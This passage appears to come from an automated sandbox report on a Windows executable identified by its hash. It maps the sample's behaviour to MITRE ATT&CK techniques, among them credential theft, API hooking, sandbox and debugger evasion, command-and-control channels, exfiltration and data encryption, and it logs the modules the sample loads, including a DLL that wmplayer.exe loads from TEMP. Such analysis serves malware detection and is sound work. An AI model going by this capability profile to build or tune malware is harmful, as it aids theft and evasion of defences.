"technique": "Code Signing", "attck_id": "T1553.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1553/002", "informative_identifiers_count": 1, "parent": {"technique": "Subvert Trust Controls", "attck_id": "T1553", "attck_id_wiki": "https://attack.mitre.org/techniques/T1553"}}, {"tactic": "Defense Evasion", "technique": "Software Packing", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Indicator Removal from Tools", "attck_id": "T1027.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/005", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 1}, {"tactic": "Credential Access", "technique": "Credentials from Password Stores", "attck_id": "T1555", "attck_id_wiki": "https://attack.mitre.org/techniques/T1555", "informative_identifiers_count": 1}, {"tactic": "Credential Access", "technique": "Credential API Hooking", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "suspicious_identifiers_count": 1, "informative_identifiers_count": 8}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "suspicious_identifiers_count": 2, "informative_identifiers_count": 23}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "suspicious_identifiers_count": 1, "informative_identifiers_count": 10}, {"tactic": "Discovery", "technique": "Security Software Discovery", "attck_id": "T1518.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Software Discovery", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518"}}, {"tactic": "Discovery", "technique": "System Language Discovery", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001", "informative_identifiers_count": 2, "parent": {"technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}}, {"tactic": "Discovery", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "suspicious_identifiers_count": 2, "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "Application Window Discovery", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010", "informative_identifiers_count": 3}, {"tactic": "Discovery", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "informative_identifiers_count": 10}, {"tactic": "Discovery", "technique": "System Time Discovery", "attck_id": "T1124", "attck_id_wiki": "https://attack.mitre.org/techniques/T1124", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "System Owner/User Discovery", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "System Service Discovery", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 3}, {"tactic": "Discovery", "technique": "Software Discovery", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Peripheral Device Discovery", "attck_id": "T1120", "attck_id_wiki": "https://attack.mitre.org/techniques/T1120", "suspicious_identifiers_count": 1}, {"tactic": "Lateral Movement", "technique": "Remote Services", "attck_id": "T1021", "attck_id_wiki": "https://attack.mitre.org/techniques/T1021", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Data from Removable Media", "attck_id": "T1025", "attck_id_wiki": "https://attack.mitre.org/techniques/T1025", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Local Data Staging", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001", "informative_identifiers_count": 1, "parent": {"technique": "Data Staged", "attck_id": "T1074", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074"}}, {"tactic": "Collection", "technique": "Screen Capture", "attck_id": "T1113", "attck_id_wiki": "https://attack.mitre.org/techniques/T1113", "informative_identifiers_count": 2}, {"tactic": "Collection", "technique": "Email Collection", "attck_id": "T1114", "attck_id_wiki": "https://attack.mitre.org/techniques/T1114", "suspicious_identifiers_count": 1}, {"tactic": "Collection", "technique": "Credential API Hooking", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Collection", "technique": "Data from Local System", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "suspicious_identifiers_count": 1, "informative_identifiers_count": 4}, {"tactic": "Command and Control", "technique": "Web Service", "attck_id": "T1102", "attck_id_wiki": "https://attack.mitre.org/techniques/T1102", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573", "informative_identifiers_count": 3}, {"tactic": "Command and Control", "technique": "Web Protocols", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Mail Protocols", "attck_id": "T1071.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/003", "informative_identifiers_count": 1, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "suspicious_identifiers_count": 4, "informative_identifiers_count": 2}, {"tactic": "Command and Control", "technique": "Asymmetric Cryptography", "attck_id": "T1573.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/002", "suspicious_identifiers_count": 2, "parent": {"technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}}, {"tactic": "Command and Control", "technique": "Proxy", "attck_id": "T1090", "attck_id_wiki": "https://attack.mitre.org/techniques/T1090", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "DNS", "attck_id": "T1071.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/004", "informative_identifiers_count": 1, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Dead Drop Resolver", "attck_id": "T1102.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1102/001", "suspicious_identifiers_count": 1, "parent": {"technique": "Web Service", "attck_id": "T1102", "attck_id_wiki": "https://attack.mitre.org/techniques/T1102"}}, {"tactic": "Command and Control", "technique": "Symmetric Cryptography", "attck_id": "T1573.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/001", "informative_identifiers_count": 1, "parent": {"technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}}, {"tactic": "Exfiltration", "technique": "Scheduled Transfer", "attck_id": "T1029", "attck_id_wiki": "https://attack.mitre.org/techniques/T1029", "informative_identifiers_count": 1}, {"tactic": "Exfiltration", "technique": "Exfiltration Over Web Service", "attck_id": "T1567", "attck_id_wiki": "https://attack.mitre.org/techniques/T1567", "suspicious_identifiers_count": 1}, {"tactic": "Impact", "technique": "Service Stop", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Impact", "technique": "Data Encrypted for Impact", "attck_id": "T1486", "attck_id_wiki": "https://attack.mitre.org/techniques/T1486", "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "Data Manipulation", "attck_id": "T1565", "attck_id_wiki": "https://attack.mitre.org/techniques/T1565", "malicious_identifiers_count": 1}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" loaded module \"GDI32.DLL\" at base 76320000\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" loaded module \"%WINDIR%\\SYSTEM32\\IMM32.DLL\" at base 75f00000\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71110000\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" loaded module \"KERNEL32\" at base 77590000\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" loaded module \"ADVAPI32.DLL\" at base 77c30000\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V4.0.30319\\MSCOREEI.DLL\" at base 6bf10000\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" loaded module \"SHLWAPI.DLL\" at base 75d40000\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" loaded module \"API-MS-WIN-APPMODEL-RUNTIME-L1-1-2.DLL\" at base 0\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" loaded module \"API-MS-WIN-APPMODEL-RUNTIME-L1-1-0.DLL\" at base 0\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" loaded module \"VERSION.DLL\" at base 74e60000\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V4.0.30319\\CLR.DLL\" at base 65070000\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" loaded module \"USER32.DLL\" at base 765b0000\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" loaded module \"API-MS-WIN-CORE-QUIRKS-L1-1-0.DLL\" at base 0\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V4.0.30319\\MSCOREE.DLL\" at base 0\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" loaded module \"MSCOREE.DLL\" at base 6bfa0000\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" loaded module \"%WINDIR%\\SYSTEM32\\COMBASE.DLL\" at base 0\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" loaded module \"PSAPI.DLL\" at base 77c20000\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" loaded module \"RPCRT4.DLL\" at base 76270000\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" loaded module \"KERNEL32.DLL\" at base 77590000\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V4.0.30319_32\\MSCORLIB\\36EACCFDE177C2E7B93B8DBDDE4E012A\\MSCORLIB.NI.DLL\" at base 63c60000\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V4.0.30319\\OLE32.DLL\" at base 0\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" loaded module \"OLE32.DLL\" at base 75da0000\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" loaded module \"CRYPTBASE.DLL\" at base 758c0000\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 74440000\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" loaded module \"API-MS-WIN-CORE-XSTATE-L2-1-0.DLL\" at base 6c5d0000\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V4.0.30319\\CLRJIT.DLL\" at base 6a870000\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V4.0.30319_32\\SYSTEM\\2C3C912EA8F058F9D04C4650128FEB3F\\SYSTEM.NI.DLL\" at base 63200000\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V4.0.30319_32\\SYSTEM.DRAWING\\F7568D7F1B9D356F64779B4C0927CFB3\\SYSTEM.DRAWING.NI.DLL\" at base 6a6c0000\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V4.0.30319_32\\SYSTEM.WINDOWS.FORMS\\C9A4CBC00F690A9E3CDDFC400F6E85BB\\SYSTEM.WINDOWS.FORMS.NI.DLL\" at base 62390000\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\ASSEMBLY\\GAC_MSIL\\SYSTEM.WINDOWS.FORMS\\V4.0_4.0.0.0__B77A5C561934E089\\UXTHEME.DLL\" at base 0\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" loaded module \"UXTHEME.DLL\" at base 74440000\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V4.0.30319_32\\SYSTEM.CORE\\31FAE3290FAD30C31C98651462D22724\\SYSTEM.CORE.NI.DLL\" at base 61b70000\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V4.0.30319_32\\SYSTEM.CONFIGURATION\\96F7EDB07B12303F0EC2595C7F3778C7\\SYSTEM.CONFIGURATION.NI.DLL\" at base 68bb0000\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V4.0.30319_32\\SYSTEM.XML\\15AF16D373CF0528CB74FC73D365FDBF\\SYSTEM.XML.NI.DLL\" at base 613f0000\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V4.0.30319\\NLSSORTING.DLL\" at base 6bbe0000\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" loaded module \"NTDLL.DLL\" at base 77ac0000\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" loaded module \"SHELL32.DLL\" at base 76680000\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" loaded module \"API-MS-WIN-SECURITY-SDDL-L1-1-0.DLL\" at base 75cf0000\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" loaded module \"PROFAPI.DLL\" at base 759e0000\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\ASSEMBLY\\GAC_32\\MSCORLIB\\V4.0_4.0.0.0__B77A5C561934E089\\BCRYPT.DLL\" at base 0\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" loaded module \"BCRYPT.DLL\" at base 754e0000\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" loaded module \"CRYPTSP.DLL\" at base 753d0000\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 75160000\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" loaded module \"IMM32.DLL\" at base 75f00000\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" loaded module \"COMCTL32.DLL\" at base 72150000\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" loaded module \"GDIPLUS.DLL\" at base 742a0000\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" loaded module \"%WINDIR%\\WINSXS\\X86_MICROSOFT.WINDOWS.GDIPLUS_6595B64144CCF1DF_1.1.7601.23894_NONE_5C0BE957A009922E\\GDIPLUS.DLL\" at base 742a0000\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 77590000\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" loaded module \"C:\\NTDLL.DLL\" at base 0\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\ASSEMBLY\\GAC_32\\MSCORLIB\\V4.0_4.0.0.0__B77A5C561934E089\\SHELL32.DLL\" at base 0\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" loaded module \"SSPICLI.DLL\" at base 75850000\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\ASSEMBLY\\GAC_MSIL\\SYSTEM\\V4.0_4.0.0.0__B77A5C561934E089\\PSAPI.DLL\" at base 0\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\ASSEMBLY\\GAC_MSIL\\SYSTEM\\V4.0_4.0.0.0__B77A5C561934E089\\RASAPI32.DLL\" at base 0\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" loaded module \"RASAPI32.DLL\" at base 6c270000\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" loaded module \"RTUTILS.DLL\" at base 737d0000\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" loaded module \"API-MS-WIN-SERVICE-MANAGEMENT-L1-1-0.DLL\" at base 75cf0000\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" loaded module \"API-MS-WIN-SERVICE-WINSVC-L1-1-0.DLL\" at base 75cf0000\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\ASSEMBLY\\GAC_MSIL\\SYSTEM\\V4.0_4.0.0.0__B77A5C561934E089\\WS2_32.DLL\" at base 0\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" loaded module \"WS2_32.DLL\" at base 77550000\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" loaded module \"%WINDIR%\\SYSTEM32\\MSWSOCK.DLL\" at base 75390000\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WSHTCPIP.DLL\" at base 74ef0000\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WSHIP6.DLL\" at base 75380000\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" loaded module \"RASMAN.DLL\" at base 6de90000\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\ASSEMBLY\\GAC_MSIL\\SYSTEM\\V4.0_4.0.0.0__B77A5C561934E089\\WINHTTP.DLL\" at base 0\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" loaded module \"WINHTTP.DLL\" at base 71d30000\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" loaded module \"CREDSSP.DLL\" at base 75090000\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" loaded module \"IPHLPAPI.DLL\" at base 73d30000\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" loaded module \"DHCPCSVC6.DLL\" at base 73c40000\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" loaded module \"DHCPCSVC.DLL\" at base 73b50000\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" loaded module \"NSI.DLL\" at base 77d00000\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" loaded module \"CFGMGR32.DLL\" at base 75cb0000\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" loaded module \"OLEAUT32.DLL\" at base 761d0000\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" loaded module \"API-MS-WIN-SECURITY-LSALOOKUP-L1-1-0.DLL\" at base 75cf0000\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" loaded module \"RPCRTREMOTE.DLL\" at base 75960000\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" loaded module \"API-MS-WIN-SERVICE-MANAGEMENT-L2-1-0.DLL\" at base 75cf0000\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\ASSEMBLY\\GAC_MSIL\\SYSTEM\\V4.0_4.0.0.0__B77A5C561934E089\\IPHLPAPI.DLL\" at base 0\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" loaded module \"DNSAPI.DLL\" at base 75250000\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" loaded module \"RASADHLP.DLL\" at base 72010000\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" loaded module \"%WINDIR%\\SYSTEM32\\FWPUCLNT.DLL\" at base 73ca0000\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\ASSEMBLY\\GAC_MSIL\\SYSTEM\\V4.0_4.0.0.0__B77A5C561934E089\\SECUR32.DLL\" at base 0\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" loaded module \"SECUR32.DLL\" at base 756f0000\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" loaded module \"%WINDIR%\\SYSTEM32\\SCHANNEL.DLL\" at base 751d0000\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" loaded module \"NCRYPT.DLL\" at base 75500000\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" loaded module \"%WINDIR%\\SYSTEM32\\BCRYPTPRIMITIVES.DLL\" at base 750a0000\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\ASSEMBLY\\GAC_MSIL\\SYSTEM\\V4.0_4.0.0.0__B77A5C561934E089\\CRYPT32.DLL\" at base 0\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" loaded module \"CRYPT32.DLL\" at base 75b70000\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V4.0.30319\\CRYPT32.DLL\" at base 0\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" loaded module \"USERENV.DLL\" at base 75b50000\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" loaded module \"GPAPI.DLL\" at base 74fa0000\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" loaded module \"PROPSYS.DLL\" at base 74660000\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" loaded module \"COMCTL32.DLL\" at base 74890000\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" loaded module \"APPHELP.DLL\" at base 75870000\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" loaded module \"CLBCATQ.DLL\" at base 773a0000\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" loaded module \"%WINDIR%\\SYSTEM32\\IEFRAME.DLL\" at base 6ac20000\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" loaded module \"SETUPAPI.DLL\" at base 75fd0000\n \"wmplayer.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71110000\n \"wmplayer.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"wmplayer.exe\" loaded module \"KERNEL32\" at base 77590000\n \"wmplayer.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"wmplayer.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6a920000\n \"wmplayer.exe\" loaded module \"ADVAPI32.DLL\" at base 77c30000\n 